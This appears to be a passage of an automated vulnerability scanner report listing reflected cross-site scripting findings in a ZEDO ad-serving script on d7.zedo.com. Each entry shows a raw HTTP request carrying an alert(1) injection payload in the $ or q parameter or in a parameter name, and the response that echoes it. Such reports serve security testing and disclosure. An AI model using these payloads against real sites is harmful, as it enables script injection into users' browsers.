1.148. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab871'%3balert(1)//3d87bda826d was submitted in the $ parameter. This input was echoed as ab871';alert(1)//3d87bda826d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=ab871'%3balert(1)//3d87bda826d&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:ab871';alert(1)//3d87bda826d;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Mon, 14 Feb 2011 01:16:00 GMT
Date: Mon, 14 Feb 2011 01:15:06 GMT
Connection: close
Content-Length: 2069

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ab871';alert(1)//3d87bda826d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ab871';alert(1)//3d87bda826d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.149. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34260"%3balert(1)//38aea2a88ac was submitted in the $ parameter. This input was echoed as 34260";alert(1)//38aea2a88ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=34260"%3balert(1)//38aea2a88ac&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:34260";alert(1)//38aea2a88ac;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1504B1120,1#822421|0,1,1;expires=Wed, 16 Mar 2011 01:15:05 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:05 GMT
Connection: close
Content-Length: 2866

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',34260";alert(1)//38aea2a88ac';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,34260";alert(1)//38aea2a88ac;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                   var zzStr = "s=1;u=INmz6woBAD
...[SNIP]...

1.150. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f4e5'-alert(1)-'557283196c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?1f4e5'-alert(1)-'557283196c1=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=1120,1,9; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFAbh=766B305,20|320_1#365; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=38
Expires: Mon, 14 Feb 2011 01:26:34 GMT
Date: Mon, 14 Feb 2011 01:25:56 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=1f4e5'-alert(1)-'557283196c1=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.151. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c4b'%3balert(1)//c3552fa4464 was submitted in the q parameter. This input was echoed as 16c4b';alert(1)//c3552fa4464 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=16c4b'%3balert(1)//c3552fa4464&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='16c4b';alert(1)//c3552fa4464';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=16c4b';alert(1)//c3552fa4464;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.152. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdf1d"%3balert(1)//afba566bf60 was submitted in the q parameter. This input was echoed as cdf1d";alert(1)//afba566bf60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=cdf1d"%3balert(1)//afba566bf60&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=285
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:19 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='cdf1d";alert(1)//afba566bf60';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=cdf1d";alert(1)//afba566bf60;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.153. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload befbf"%3balert(1)//9c15c465b7a was submitted in the q parameter. This input was echoed as befbf";alert(1)//9c15c465b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=befbf"%3balert(1)//9c15c465b7a&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,